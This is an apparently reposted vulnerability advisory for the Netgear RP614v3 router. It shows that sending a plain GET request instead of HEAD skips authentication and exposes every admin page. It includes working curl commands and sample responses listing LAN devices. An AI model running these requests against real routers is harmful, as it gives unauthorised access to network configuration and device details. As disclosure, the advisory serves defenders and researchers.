Home / os / winmobile

Netgear RP614v3 Authentication Bypass

Posted on 08 February 2016

########################################### Vendor : NETGEAR Product : RP614v3 informed on : 12. 10. 2015 responded : no fixed : no Effect : Remotely exploitable over LAN/WLAN Typ : Authentication Bypass Difficulty : trivial ########################################### The N300 FW authentication bypass inspired me to check my rp614v3 router and I found this bypass: Firmware: *Firmwareversion* V6.0GR Oct 26 2004 ( which seems to be the lastest ) It's an old model, but it's still in operation with ADSL2 connections like TCOM DSL6000 in Germany. How it works: If you use a normal browser, it sends a *HEAD*, followed by a GET, to the router first, which gets a 403 Forbidden back: # curl -I "http://192.168.1.1/contents1.html" HTTP/1.0 403 Forbidden this was expected and is the valid answere, but if you send a *GET* instead of the HEAD and your not authenticated, you get the 200 back : # curl -i "http://192.168.1.1/contents1.html" HTTP/1.0 200 OK Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc. Content-length: 7158 Accept-ranges: bytes Content-type: text/html <html> <head> <meta http-equiv="content-type" content="text/html;charset=windows-1252"> <meta name="generator" content="Adobe GoLive 5"> ... Works for every page, with all informations disclosed the router has to offer. No password nor a username needed. Example : #curl -i "http://192.168.1.1/lanform.html" HTTP/1.0 200 OK Server: Embedded HTTPD v1.00, 1999(c) Delta Networks Inc. Content-length: 13722 Accept-ranges: bytes Content-type: text/html .... <table border ="1" cellpadding ="0" cellspacing ="0" width="100%"> <tr> <td nowrap width="5%" align="center"> <span class="thead">�</span> </td> <td nowrap width="3%" align="center"> <span class="thead">#</span> </td> <td nowrap width="24%" align="center"> <span class="thead">IP-Adresse</span> </td> <td nowrap width="34%" align="center"> <span class="thead">Ger�tename</span> </td> <td nowrap width="34%" align="center"> <span class="thead">MAC-Adresse</span> </td> </tr> <tr><td nowrap width="5%" align="center"><input type="radio" value="0" checked name="X1" onClick="check(this.value)"></td><td nowrap width="3%" align="center">1</td><td nowrap width="24%" align="center">*192.168.1.2*</td><td nowrap width="34%" align="center">LapTop</td><td nowrap width="34%" align="center">*00:15:a5:d5:f7:7c*</td></tr><tr><td nowrap width="5%" align="center"><input type="radio" value="1" name="X1" onClick="check(this.value)"></td><td nowrap width="3%" align="center">2</td><td nowrap width="24%" align="center">*192.168.1.3*</td><td nowrap width="34%" align="center">Accesspoint</td><td nowrap width="34%" align="center">*21:6e:5c:23:86:a2*</td></tr> </table> (all ips and mac have been changed ) Sidenote: As it's a problem of the underlying httpd server from "Delta Networks Inc." , it's most likely to be effecting all dsl router products using that same version of the httpd.

 

TOP